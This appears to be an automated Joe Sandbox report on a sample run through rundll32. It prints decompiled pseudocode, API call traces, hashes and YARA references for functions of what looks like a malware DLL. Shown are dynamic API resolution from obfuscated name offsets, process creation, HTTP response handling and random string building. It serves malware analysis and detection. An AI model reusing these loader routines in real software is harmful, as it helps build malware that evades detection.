wsprintfA.USER32 ref: 02E36D25
wsprintfA.USER32 ref: 02E36D47
wsprintfA.USER32 ref: 02E36D6E
wsprintfA.USER32 ref: 02E36D8F
wsprintfA.USER32 ref: 02E36DBA
HeapFree.KERNEL32(00000000,?), ref: 02E36DCD
wsprintfA.USER32 ref: 02E36DEC
HeapFree.KERNEL32(00000000,?), ref: 02E36DFD

Part of subcall function 02E34B69: RtlEnterCriticalSection.NTDLL(04EA95C0), ref: 02E34B85
Part of subcall function 02E34B69: RtlLeaveCriticalSection.NTDLL(04EA95C0), ref: 02E34BA3

RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02E36E2C
GetTickCount.KERNEL32 ref: 02E36E3E
RtlEnterCriticalSection.NTDLL(04EA95C0), ref: 02E36E52
RtlLeaveCriticalSection.NTDLL(04EA95C0), ref: 02E36E70

Part of subcall function 02E32281: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,775EC740,02E33831,00000000,04EA9600), ref: 02E322AC
Part of subcall function 02E32281: lstrlen.KERNEL32(00000000,?,775EC740,02E33831,00000000,04EA9600), ref: 02E322B4
Part of subcall function 02E32281: strcpy.NTDLL ref: 02E322CB
Part of subcall function 02E32281: lstrcat.KERNEL32(00000000,00000000), ref: 02E322D6
Part of subcall function 02E32281: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,02E33831,?,775EC740,02E33831,00000000,04EA9600), ref: 02E322F3

StrTrimA.SHLWAPI(00000000,02E39280,?,04EA9600), ref: 02E36EA2

Part of subcall function 02E36311: lstrlen.KERNEL32(04EA9BB8,00000000,00000000,00000000,02E3385C,00000000), ref: 02E36321
Part of subcall function 02E36311: lstrlen.KERNEL32(?), ref: 02E36329
Part of subcall function 02E36311: lstrcpy.KERNEL32(00000000,04EA9BB8), ref: 02E3633D
Part of subcall function 02E36311: lstrcat.KERNEL32(00000000,?), ref: 02E36348

lstrcpy.KERNEL32(00000000,?), ref: 02E36EC5
lstrcpy.KERNEL32(?,?), ref: 02E36ECF
lstrcat.KERNEL32(?,?), ref: 02E36EDF
lstrcat.KERNEL32(?,00000000), ref: 02E36EE6

Part of subcall function 02E33D2E: lstrlen.KERNEL32(?,00000000,04EA9DC0,00000000,02E3695F,04EA9FE3,69B25F44,?,?,?,?,69B25F44,00000005,02E3A00C,4D283A53,?), ref: 02E33D35
Part of subcall function 02E33D2E: mbstowcs.NTDLL ref: 02E33D5E
Part of subcall function 02E33D2E: memset.NTDLL ref: 02E33D70

wcstombs.NTDLL ref: 02E36F89

Part of subcall function 02E31335: SysAllocString.OLEAUT32(?), ref: 02E31370

Part of subcall function 02E3789E: RtlFreeHeap.NTDLL(00000000,00000000,02E34E3E,00000000,?,00000000,00000000), ref: 02E378AA

HeapFree.KERNEL32(00000000,?), ref: 02E36FD2
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02E36FDE
HeapFree.KERNEL32(00000000,?,?,04EA9600), ref: 02E36FEB
HeapFree.KERNEL32(00000000,?), ref: 02E36FF8
HeapFree.KERNEL32(00000000,?), ref: 02E37002

Strings

Uqt, xrefs: 02E36D9B

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: Heap$Free$wsprintf$lstrlen$CriticalSectionlstrcat$lstrcpy$CountEnterLeaveTickTrim$AllocAllocateStringmbstowcsmemsetstrcpywcstombs
String ID: Uqt
API String ID: 1185349883-2320327147
Opcode ID: 3ddabf5ba77236423a43d54ee2255f125b3c23c84efbb1beff520f0260e73ba0
Instruction ID: ae5f351cb749d930288bacd2454dca27f5896a4810e83f4d4a8c02606d33dbb5
Opcode Fuzzy Hash: 3ddabf5ba77236423a43d54ee2255f125b3c23c84efbb1beff520f0260e73ba0
Instruction Fuzzy Hash: 04A1AB71980208AFC712EF66DC4CE5A7BE9EF8871AF455828F489D7220C731D9A4CF51

Uniqueness

Uniqueness Score: -1.00%

Function 02E33BF0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 109
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E02E33BF0(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E02E32AA6(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E02E37A86( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x2e3a300 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x2e3a348; // 0x206d5a8
					_t18 = _t47 + 0x2e3b3f3; // 0x73797325
					_t68 = E02E33A12(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x2e3a348; // 0x206d5a8
						_t19 = _t50 + 0x2e3b73f; // 0x4ea8ce7
						_t20 = _t50 + 0x2e3b0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E02E32058();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E02E32058();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x2e3a2d8, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E02E3789E(_t70);
				goto L12;
			}

0x02e33bf8
0x02e33bf8
0x02e33c07
0x02e33c0e
0x02e33c13
0x02e33d20
0x02e33d27
0x02e33d27
0x02e33c22
0x02e33c2a
0x02e33c2d
0x02e33c32
0x02e33c47
0x02e33c4d
0x02e33c4e
0x02e33c51
0x02e33c57
0x02e33c5a
0x02e33c5f
0x02e33c67
0x02e33c73
0x02e33c77
0x02e33d07
0x02e33c7d
0x02e33c7d
0x02e33c82
0x02e33c89
0x02e33c9d
0x02e33ca1
0x02e33cf0
0x02e33ca3
0x02e33ca4
0x02e33cab
0x02e33cc4
0x02e33cc6
0x02e33cca
0x02e33cd1
0x02e33ceb
0x02e33cd3
0x02e33cdc
0x02e33ce1
0x02e33ce1
0x02e33cd1
0x02e33cff
0x02e33cff
0x02e33c77
0x02e33d0e
0x02e33d17
0x02e33d1b
0x00000000

APIs

Part of subcall function 02E32AA6: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,02E33C0C,?,?,?,?,00000000,00000000), ref: 02E32ACB
Part of subcall function 02E32AA6: GetProcAddress.KERNEL32(00000000,7243775A), ref: 02E32AED
Part of subcall function 02E32AA6: GetProcAddress.KERNEL32(00000000,614D775A), ref: 02E32B03
Part of subcall function 02E32AA6: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02E32B19
Part of subcall function 02E32AA6: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02E32B2F
Part of subcall function 02E32AA6: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02E32B45

memset.NTDLL ref: 02E33C5A

Part of subcall function 02E33A12: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,02E33C73,73797325), ref: 02E33A23
Part of subcall function 02E33A12: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 02E33A3D

GetModuleHandleA.KERNEL32(4E52454B,04EA8CE7,73797325), ref: 02E33C90
GetProcAddress.KERNEL32(00000000), ref: 02E33C97
HeapFree.KERNEL32(00000000,00000000), ref: 02E33CFF

Part of subcall function 02E32058: GetProcAddress.KERNEL32(36776F57,02E358B5), ref: 02E32073

CloseHandle.KERNEL32(00000000,00000001), ref: 02E33CDC
CloseHandle.KERNEL32(?), ref: 02E33CE1
GetLastError.KERNEL32(00000001), ref: 02E33CE5

Strings

@MqtNqt, xrefs: 02E33CE5
Uqt, xrefs: 02E33CFF

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
String ID: Uqt$@MqtNqt
API String ID: 3075724336-3266969629
Opcode ID: 2b7f24263fa34e21d20fb08e1909d941dc76339efef957041deeb8fa41110981
Instruction ID: 6ec639c5f0dadf7086d9bc2984161216591e85f2ddad11788e9c669142248bea
Opcode Fuzzy Hash: 2b7f24263fa34e21d20fb08e1909d941dc76339efef957041deeb8fa41110981
Instruction Fuzzy Hash: 05314F75C8020CAFDB11AFA5D88CE9EBBB8EF0434AF1048A5F645A7111D7709A84CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02E34E4D Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 92
networksynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02E34E4D(void* __ecx, void* __esi) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				void* _t58;
				void* _t59;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_v8 = 4;
						_v16 = 0;
						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
							_t58 = E02E37A71(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
									E02E3789E(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *(_t61 + 0xc) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E02E32129( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}

0x02e34e4d
0x02e34e4d
0x02e34e5d
0x02e34e60
0x02e34e64
0x02e34e6a
0x02e34e6f
0x02e34e88
0x02e34e9c
0x02e34ea3
0x02e34eaa
0x02e34efd
0x02e34f03
0x02e34f09
0x02e34f44
0x02e34f4a
0x00000000
0x00000000
0x00000000
0x02e34f09
0x02e34eb0
0x00000000
0x02e34eb7
0x02e34ec5
0x02e34ec8
0x02e34ecb
0x02e34ed7
0x02e34edb
0x02e34f3d
0x02e34edd
0x02e34eef
0x02e34f2d
0x02e34f38
0x02e34ef1
0x02e34ef4
0x02e34ef8
0x02e34ef8
0x02e34eef
0x00000000
0x02e34edb
0x02e34eb0
0x02e34e74
0x02e34e7a
0x02e34e7d
0x02e34e82
0x00000000
0x00000000
0x00000000
0x02e34f12
0x02e34f1a
0x02e34f1f
0x02e34f22
0x00000000

APIs

WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,747581D0,00000000,00000000), ref: 02E34E64
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,02E33897,00000000,?), ref: 02E34E74
HttpQueryInfoA.WININET(?,20000013,?,?), ref: 02E34EA6
HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 02E34ECB
HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 02E34EEB
GetLastError.KERNEL32 ref: 02E34EFD

Part of subcall function 02E32129: WaitForMultipleObjects.KERNEL32(00000002,02E37C1D,00000000,02E37C1D,?,?,?,02E37C1D,0000EA60), ref: 02E32144

Part of subcall function 02E3789E: RtlFreeHeap.NTDLL(00000000,00000000,02E34E3E,00000000,?,00000000,00000000), ref: 02E378AA

GetLastError.KERNEL32(00000000), ref: 02E34F32

Strings

@MqtNqt, xrefs: 02E34EFD, 02E34F32

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
String ID: @MqtNqt
API String ID: 3369646462-2883916605
Opcode ID: 59550463e241bb5f3bd7d375bdf43118f602d05d0c2787f0486654619fbe8e75
Instruction ID: 4bab79c848fcfa29df816f21975de1d2784b81bcc124b6d3ead7573dea486494
Opcode Fuzzy Hash: 59550463e241bb5f3bd7d375bdf43118f602d05d0c2787f0486654619fbe8e75
Instruction Fuzzy Hash: 2031F0B5D4070DEFDB21DFA6C88899EB7B8EB04306F149969E542E2241D7719A44DF10

Uniqueness

Uniqueness Score: -1.00%

Function 02E341C5 Relevance: 13.6, APIs: 9, Instructions: 145
stringCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E02E341C5(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr _v32;
				void* __edi;
				void* __esi;
				intOrPtr _t58;
				signed int _t60;
				signed int _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t70;
				void* _t72;
				void* _t75;
				void* _t76;
				intOrPtr _t80;
				WCHAR* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				intOrPtr _t92;
				intOrPtr* _t102;
				signed int _t103;
				void* _t104;
				intOrPtr _t105;
				void* _t107;
				intOrPtr* _t115;
				void* _t119;
				intOrPtr _t125;

				_t58 =  *0x2e3a3dc; // 0x4ea9c68
				_v24 = _t58;
				_v28 = 8;
				_v20 = GetTickCount();
				_t60 = E02E3540A();
				_t103 = 5;
				_t98 = _t60 % _t103 + 6;
				_t62 = E02E3540A();
				_t117 = _t62 % _t103 + 6;
				_v32 = _t62 % _t103 + 6;
				_t64 = E02E32C2A(_t60 % _t103 + 6);
				_v16 = _t64;
				if(_t64 != 0) {
					_t66 = E02E32C2A(_t117);
					_v12 = _t66;
					if(_t66 != 0) {
						_push(5);
						_t104 = 0xa;
						_t119 = E02E35C2F(_t104,  &_v20);
						if(_t119 == 0) {
							_t119 = 0x2e3918c;
						}
						_t70 = E02E3224E(_v24);
						_v8 = _t70;
						if(_t70 != 0) {
							_t115 = __imp__;
							_t72 =  *_t115(_t119);
							_t75 =  *_t115(_v8);
							_t76 =  *_t115(_a4);
							_t80 = E02E37A71(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
							_v24 = _t80;
							if(_t80 != 0) {
								_t105 =  *0x2e3a348; // 0x206d5a8
								_t102 =  *0x2e3a138; // 0x2e37db3
								_t28 = _t105 + 0x2e3bb08; // 0x530025
								 *_t102(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
								_push(4);
								_t107 = 5;
								_t83 = E02E35C2F(_t107,  &_v20);
								_a8 = _t83;
								if(_t83 == 0) {
									_a8 = 0x2e39190;
								}
								_t84 =  *_t115(_a8);
								_t85 =  *_t115(_v8);
								_t86 =  *_t115(_a4);
								_t125 = E02E37A71(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
								if(_t125 == 0) {
									E02E3789E(_v24);
								} else {
									_t92 =  *0x2e3a348; // 0x206d5a8
									_t44 = _t92 + 0x2e3bc80; // 0x73006d
									 *_t102(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
									 *_a16 = _v24;
									_v28 = _v28 & 0x00000000;
									 *_a20 = _t125;
								}
							}
							E02E3789E(_v8);
						}
						E02E3789E(_v12);
					}
					E02E3789E(_v16);
				}
				return _v28;
			}

0x02e341cb
0x02e341d3
0x02e341d6
0x02e341e3
0x02e341e6
0x02e341ed
0x02e341f4
0x02e341f7
0x02e34204
0x02e34207
0x02e3420a
0x02e3420f
0x02e34214
0x02e3421c
0x02e34221
0x02e34226
0x02e3422c
0x02e34230
0x02e34239
0x02e3423d
0x02e3423f
0x02e3423f
0x02e34247
0x02e3424c
0x02e34251
0x02e34257
0x02e3425e
0x02e3426f
0x02e34276
0x02e34288
0x02e3428d
0x02e34292
0x02e3429b
0x02e342a4
0x02e342ad
0x02e342c3
0x02e342c8
0x02e342cc
0x02e342d0
0x02e342d5
0x02e342da
0x02e342dc
0x02e342dc
0x02e342e6
0x02e342ef
0x02e342f6
0x02e34312
0x02e34316
0x02e3434f
0x02e34318
0x02e3431b
0x02e34323
0x02e34334
0x02e3433c
0x02e34344
0x02e34348
0x02e34348
0x02e34316
0x02e34357
0x02e34357
0x02e3435f
0x02e3435f
0x02e34367
0x02e34367
0x02e34373

APIs

GetTickCount.KERNEL32 ref: 02E341DD
lstrlen.KERNEL32(00000000,00000005), ref: 02E3425E
lstrlen.KERNEL32(?), ref: 02E3426F
lstrlen.KERNEL32(00000000), ref: 02E34276
lstrlenW.KERNEL32(80000002), ref: 02E3427D
lstrlen.KERNEL32(?,00000004), ref: 02E342E6
lstrlen.KERNEL32(?), ref: 02E342EF
lstrlen.KERNEL32(?), ref: 02E342F6
lstrlenW.KERNEL32(?), ref: 02E342FD

Part of subcall function 02E3789E: RtlFreeHeap.NTDLL(00000000,00000000,02E34E3E,00000000,?,00000000,00000000), ref: 02E378AA

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: lstrlen$CountFreeHeapTick
String ID:
API String ID: 2535036572-0
Opcode ID: 396821115d71439fa8d23ffb0e983f07a21375629ce0cca265ce361ff7669628
Instruction ID: 2b5e3d6e3cec3562330d9c76dc7d45916eb076df896c30e0a84ff4594149f155
Opcode Fuzzy Hash: 396821115d71439fa8d23ffb0e983f07a21375629ce0cca265ce361ff7669628
Instruction Fuzzy Hash: 4F518F72D80219ABCF12AFA5DC48ADE7BB2EF4431AF158064F904A7250DB35CE65DF90

Uniqueness

Uniqueness Score: -1.00%

Function 02E32AA6 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02E32AA6(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E02E37A71(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x2e3a348; // 0x206d5a8
					_t1 = _t23 + 0x2e3b11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x2e3a348; // 0x206d5a8
					_t2 = _t26 + 0x2e3b761; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E02E3789E(_t54);
					} else {
						_t30 =  *0x2e3a348; // 0x206d5a8
						_t5 = _t30 + 0x2e3b74e; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x2e3a348; // 0x206d5a8
							_t7 = _t33 + 0x2e3b771; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x2e3a348; // 0x206d5a8
								_t9 = _t36 + 0x2e3b4ca; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x2e3a348; // 0x206d5a8
									_t11 = _t39 + 0x2e3b786; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E02E32156(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x02e32ab5
0x02e32ab9
0x02e32b7b
0x02e32abf
0x02e32abf
0x02e32ac4
0x02e32ad7
0x02e32ad9
0x02e32ade
0x02e32ae6
0x02e32aed
0x02e32aef
0x02e32af4
0x02e32b73
0x02e32b74
0x02e32af6
0x02e32af6
0x02e32afb
0x02e32b03
0x02e32b05
0x02e32b0a
0x00000000
0x02e32b0c
0x02e32b0c
0x02e32b11
0x02e32b19
0x02e32b1b
0x02e32b20
0x00000000
0x02e32b22
0x02e32b22
0x02e32b27
0x02e32b2f
0x02e32b31
0x02e32b36
0x00000000
0x02e32b38
0x02e32b38
0x02e32b3d
0x02e32b45
0x02e32b47
0x02e32b4c
0x00000000
0x02e32b4e
0x02e32b54
0x02e32b59
0x02e32b60
0x02e32b65
0x02e32b6a
0x00000000
0x02e32b6c
0x02e32b6f
0x02e32b6f
0x02e32b6a
0x02e32b4c
0x02e32b36
0x02e32b20
0x02e32b0a
0x02e32af4
0x02e32b89

APIs

Part of subcall function 02E37A71: RtlAllocateHeap.NTDLL(00000000,00000000,02E34DB1), ref: 02E37A7D

GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,02E33C0C,?,?,?,?,00000000,00000000), ref: 02E32ACB
GetProcAddress.KERNEL32(00000000,7243775A), ref: 02E32AED
GetProcAddress.KERNEL32(00000000,614D775A), ref: 02E32B03
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02E32B19
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02E32B2F
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02E32B45

Part of subcall function 02E32156: memset.NTDLL ref: 02E321D5

Strings

Nqt, xrefs: 02E32AD1

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID: Nqt
API String ID: 1886625739-806837294
Opcode ID: db1721fe38574e97ba5d872f6fde798c92f9b696b4009516176534fcdd22bf89
Instruction ID: 356d9170be6f78be7b06bd6e359828ff51153f2765363b43643eaa7e27fe4d74
Opcode Fuzzy Hash: db1721fe38574e97ba5d872f6fde798c92f9b696b4009516176534fcdd22bf89
Instruction Fuzzy Hash: A521217198070A9FDB11DF6AC858E9AB7ECEF1474A7015429E945C7221D770DA44CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02E32D54 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02E32D54(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x2e3a30c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x2e3a2fc = _t4;
					_t6 = GetCurrentProcessId();
					 *0x2e3a2f8 = _t6;
					 *0x2e3a304 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x2e3a2f4 = _t7;
					if(_t7 == 0) {
						 *0x2e3a2f4 =  *0x2e3a2f4 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}

0x02e32d5c
0x02e32d62
0x02e32d69
0x00000000
0x02e32dc3
0x02e32d6b
0x02e32d73
0x02e32d80
0x02e32d80
0x02e32dc0
0x00000000
0x02e32dc0
0x02e32d82
0x02e32d82
0x02e32d87
0x02e32d99
0x02e32d9e
0x02e32da4
0x02e32daa
0x02e32db1
0x02e32db3
0x02e32db3
0x00000000
0x02e32dba
0x02e32d7c
0x00000000
0x00000000
0x02e32d7e
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,02E372F1,?), ref: 02E32D5C
GetVersion.KERNEL32 ref: 02E32D6B
GetCurrentProcessId.KERNEL32 ref: 02E32D87
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 02E32DA4
GetLastError.KERNEL32 ref: 02E32DC3

Strings

@MqtNqt, xrefs: 02E32DC3

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID: @MqtNqt
API String ID: 2270775618-2883916605
Opcode ID: 5fa7fb9eaad5f2a841a00aba6831d710f99b019b905e0b194d1ef34242a9a668
Instruction ID: 1c345353ec37ec30a0a4426a598af9d9cecfc25a65c8797294e57821cb4be8ca
Opcode Fuzzy Hash: 5fa7fb9eaad5f2a841a00aba6831d710f99b019b905e0b194d1ef34242a9a668
Instruction Fuzzy Hash: C0F0A470EC030B9BD7258B22A92DB643B61AB42707FD08C26EAD6C62C1D7B184E0CF15

Uniqueness

